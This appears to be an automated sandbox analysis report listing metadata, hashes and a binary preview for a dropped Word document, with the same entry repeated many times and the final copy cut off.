                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
